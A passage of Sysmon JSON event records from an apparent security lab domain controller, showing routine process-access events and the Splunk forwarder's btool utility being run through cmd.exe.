05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C0290500}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.899\r\nProcessGuid: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nProcessId: 4280\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nParentProcessId: 4292\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.899","ProcessGuid":"{A837DB8D-0239-5F25-0000-00107C2A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010C0290500}","ParentProcessId":"4292","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nSourceProcessId: 4292\r\nSourceThreadId: 4288\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010C0290500}","SourceProcessId":"4292","SourceThreadId":"4288","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00107C2A0500}","TargetProcessId":"4280","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00107C2A0500}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00107C2A0500}","TargetProcessId":"4280","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 